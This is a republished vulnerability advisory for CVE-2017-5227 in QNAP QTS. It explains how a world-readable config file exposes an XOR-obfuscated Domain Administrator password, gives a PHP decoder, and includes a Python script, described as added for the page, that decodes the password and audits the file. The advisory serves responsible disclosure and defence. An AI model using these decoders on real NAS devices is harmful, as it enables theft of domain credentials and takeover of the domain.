QNAP QTS < 4.2.4 - Domain Privilege Escalation

  • Author: Pasquale Fiorillo
    Date: 2017-03-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41745/
  • QNAP QTS Domain Privilege Escalation Vulnerability
    
     Name: Sensitive Data Exposure in QNAP QTS
     Systems Affected: QNAP QTS (NAS), all models and all versions < 4.2.4
     Severity: High 7.9/10
     Impact: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
     Vendor: http://www.qnap.com/
     Advisory: http://www.ush.it/team/ush/hack-qnap/qnap.txt
     Authors: Pasquale "sid" Fiorillo (sid AT ush DOT it)
              Guido "go" Oricchio (g.oricchio AT pcego DOT com)
     Date: 20170322
    
    I. BACKGROUND
    
     QNAP Systems, founded in 2004, provides network attached storage (NAS)
     and network video recorder (NVR) solutions for home and business use to
     the global market.
     QNAP also delivers a cloud service, called myQNAPcloud, that allows
     users to access and manage the devices from anywhere.
     QTS is the proprietary Linux-based firmware of QNAP devices.
     
     ISGroup (http://www.isgroup.biz/) is an Italian Information Security
     boutique; we found this 0day issue while supporting Guido Oricchio
     of PCego, a System Integrator, to secure a QNAP product for one of his
     customers.
     
     Responsible disclosure with QNAP: we contacted QNAP via their public
     security@ contact and quickly escalated to their Security Researcher
     Myron Su over PGP email.
    
    Prior vulnerabilities in QNAP: 
    https://www.qnap.com/en/support/con_show.php?op=showone&cid=41
    
    Information to customers of the vulnerability is shown in their bulletin
    ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
    QTS 4.2.4 Build 20170313 includes security fixes for the following
    vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
    reported by Pasquale Fiorillo of the cyber security company ISGroup
    (www.isgroup.biz), a cyber security company, and Guido Oricchio of
    PCego (www.pcego.com), a system integrator.
    
    The latest version of the software at the time of writing can be 
    obtained from:
    
    https://www.qnap.com/en-us/product_x_down/
    https://start.qnap.com/en/index.php
    https://www.qnap.com/
    
    II. DESCRIPTION
    
     The vulnerability allows a local QTS admin user, or another low privileged
     user, to access a configuration file that includes a weakly encrypted
     Microsoft Domain Administrator password if the NAS was joined to a
     Microsoft Active Directory domain.
     
     The affected component is the "uLinux.conf" configuration file,
     created with world-readable permissions and used to store a Domain
     Administrator password.
     
     The admin user can access the file using SSH, which is enabled by default.
     Other users are not allowed to log in, so they have to exploit a
     component, such as a web application, to run arbitrary commands or
     perform an arbitrary file read.
     
     TLDR: Anyone able to read the uLinux.conf file, which is world readable by
     default, can escalate to Domain Administrator if the NAS is a domain
     member.
    
    III. ANALYSIS
    
     QNAP QTS stores the "uLinux.conf" configuration file in a directory
     accessible by "nobody" and with permissions that make it readable by
     "nobody".
     
     If the NAS was joined to an Active Directory domain, that file contains a
     Domain Administrator username and password in an easily decrypted format.
     
     In older versions of QTS the Domain Admin's password was stored in
     plaintext.
    
    A) Config file readable by "nobody"
    
     [~] # ls -l /etc/config/uLinux.conf
     -rw-r--r--    1 admin    administ      7312 Dec 10 06:39 /etc/config/uLinux.conf
    
     Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U,
     TS-469L, and TS-221. Access to the file is guaranteed to all the local
     users, such as httpdusr, the account used to run web sites and web
     applications hosted on the NAS.
     
     This puts all the information contained in the configuration file at
     risk and is a violation of the principle of least privilege.
    
    https://en.wikipedia.org/wiki/Principle_of_least_privilege
    
    B) Weak encrypted password in the configuration file
    
     The Microsoft Active Directory Admin username and password are stored
     in the file obfuscated by a simple XOR cipher and base64 encoded.
    
    In this scenario, a Local File Read vulnerability could lead to full
    domain compromise given the fact that an attacker can re-use such
    credentials to authenticate against a Domain Controller with maximum
    privileges.
    
    The password field in the uLinux.conf has the following format:
    
    User = <username>
    Password = <base64>
    
    eg: 
    User = Administrator
    Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
    
    The "<base64>" decoded is:
    
     sid@zen:~$ echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
     00000000  03 03 00 00 01 01 06 06  07 07 04 04 23 23 20 20  |............##  |
     00000010  21 21 26 26 27 27 24 24  43                       |!!&&''$$C|
     00000019
     
     Each byte XORed with \x62 gives the ASCII code of the plaintext character.
     Eg:
     \x03 ^ \x62 = \x61 (a)
     \x00 ^ \x62 = \x62 (b)
     ...
     \x24 ^ \x62 = \x46 (F)
     \x43 ^ \x62 = \x21 (!)
    
    The plaintext password is: aabbccddeeffAABBCCDDEEFF!
    
    IV. EXPLOIT
    
    The following code can be used to decode the password:
    
     #!/usr/bin/php
     <?php
     // Usage: ./decode.php <base64 value from the "Password =" line of uLinux.conf>
     if ($argc < 2) {
         fwrite(STDERR, "usage: {$argv[0]} <base64>\n");
         exit(1);
     }
     // Base64-decode the stored value, then XOR every byte with 0x62 to recover the plaintext.
     $plaintext = str_split(base64_decode($argv[1]));
     foreach ($plaintext as $chr) {
         echo chr(ord($chr) ^ 0x62);
     }
     echo "\n";
    
    Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
    aabbccddeeffAABBCCDDEEFF!
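     The following Python script is an added example written for this page; it is
     not the advisory's own decoder. It covers both findings A and B above from an
     auditing angle: it implements the base64 + single-byte XOR (0x62) transform
     the advisory describes, in both directions, to show that the obfuscation is
     its own inverse, parses the "User = ... / Password = ..." lines out of the
     config text, and reports whether the file is readable by others and whether
     an AD credential stored in it is trivially recoverable. The sample config
     text, the file mode and the function names are constructed for the example;
     the only values taken from the page are the base64 string and the 0x62 key.

```python
import base64
import os
import stat
import sys
import re

# Key from the advisory: every byte of the base64-decoded value is XORed with 0x62.
XOR_KEY = 0x62


def decode_qnap_password(encoded: str) -> str:
    """Recover the plaintext from the base64/XOR-0x62 form stored in uLinux.conf."""
    raw = base64.b64decode(encoded)
    return bytes(b ^ XOR_KEY for b in raw).decode("latin-1")


def encode_qnap_password(plaintext: str) -> str:
    """Same transform in the other direction: a single-byte XOR is its own inverse."""
    raw = bytes(b ^ XOR_KEY for b in plaintext.encode("latin-1"))
    return base64.b64encode(raw).decode("ascii")


# The advisory shows a flat "Key = Value" layout for the credential lines.
_KV = re.compile(r"^\s*(User|Password)\s*=\s*(\S+)\s*$")


def parse_domain_credential(conf_text: str) -> dict:
    """Pull the User/Password pair out of the config text, ignoring other lines."""
    found = {}
    for line in conf_text.splitlines():
        m = _KV.match(line)
        if m:
            found[m.group(1).lower()] = m.group(2)
    return found


def audit_ulinux_conf(mode: int, conf_text: str) -> list:
    """Return a list of findings for a file with the given st_mode and content.

    'world-readable'                  - the file's mode has the other-read bit set
    'domain-credential-recoverable'   - a Password value is present and decodes
    'domain-credential-present'       - a Password value is present but malformed
    """
    findings = []
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    cred = parse_domain_credential(conf_text)
    if "password" in cred:
        try:
            decode_qnap_password(cred["password"])
            findings.append("domain-credential-recoverable")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            findings.append("domain-credential-present")
    return findings


# Constructed sample input (not a real uLinux.conf); the base64 value is the
# one shown in the advisory and decodes to aabbccddeeffAABBCCDDEEFF!
SAMPLE_CONF = """# constructed sample, only the User/Password lines follow the page's format
User = Administrator
Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
"""
SAMPLE_MODE = 0o100644  # -rw-r--r--, as in the advisory's ls output


if __name__ == "__main__":
    # Run against a real path (e.g. /etc/config/uLinux.conf) if one is given,
    # otherwise against the constructed sample above.
    if len(sys.argv) > 1:
        path = sys.argv[1]
        st = os.stat(path)
        with open(path, encoding="latin-1") as fh:
            text = fh.read()
        mode = st.st_mode
    else:
        text, mode = SAMPLE_CONF, SAMPLE_MODE
    for finding in audit_ulinux_conf(mode, text):
        print(finding)
```

     Running it with no arguments reports both "world-readable" and
     "domain-credential-recoverable" for the constructed sample; a file with
     mode 0600 and no Password line yields no findings. The encode function is
     included only to make the point that the "encryption" is a fixed-key XOR:
     the same operation that stores the password recovers it, so read access
     to the file is equivalent to possession of the credential.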
    
    V. VENDOR RESPONSE
     The vendor released QTS 4.2.4 Build 20170313, which contains the proper
     security patch. At the time of this writing an official patch is
     available.
    
    VI. CVE INFORMATION
    
     Mitre assigned CVE-2017-5227 to this vulnerability; internally at QNAP
     it is referred to as Case NAS-201703-21.
    
    VII. DISCLOSURE TIMELINE
    
    20161212 Bug discovered
    20170106 Request for CVE to Mitre
    20170106 Disclosure to security@qnap.com
    20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
    20170107 Details disclosure to Myron Su
     20170109 Got CVE-2017-5227 from cve-assign
     20170110 Myron Su confirms the vulnerability
     20170203 We ask for updates, no release date from vendor
     20170215 We extend the disclosure date as 28 Feb will not be met
    20170321 QNAP releases the QTS 4.2.4 Build 20170313
    20170322 Advisory disclosed to the public
    
    VIII. REFERENCES
    
    [1] Top 10 2013-A6-Sensitive Data Exposure
    https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
    
    [2] Access Control Cheat Sheet
    https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
    
    [3] https://forum.qnap.com/viewtopic.php?t=68317
    20121213 User reporting that the password was stored in plaintext in
    a world-readable file
    
     [4] https://www.qnap.com/en/support/con_show.php?cid=113
     QNAP Security Bulletin NAS-201703-21
    
    IX. CREDIT
    
    Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the 
    discovery of this vulnerability.
    
    Pasquale "sid" Fiorillo
    web site: http://www.pasqualefiorillo.it/
    mail: sid AT ush DOT it
    
    Guido "go" Oricchio
    web site: http://www.pcego.com/
    mail: g.oricchio AT pcego DOT com
    
    X. LEGAL NOTICES
    
    Copyright (c) 2017 Pasquale "sid" Fiorillo
    
     Permission is granted for the redistribution of this alert
     electronically. It may not be edited in any way without my express
     written consent. If you wish to reprint the whole or any
     part of this alert in any medium other than electronically,
     please email me for permission.
    
    Disclaimer: The information in the advisory is believed to be accurate
    at the time of publishing based on currently available information. Use
    of the information constitutes acceptance for use in an AS IS condition.
    There are no warranties with regard to this information. Neither the
    author nor the publisher accepts any liability for any direct, indirect,
    or consequential loss or damage arising from use of, or reliance on,
    this information.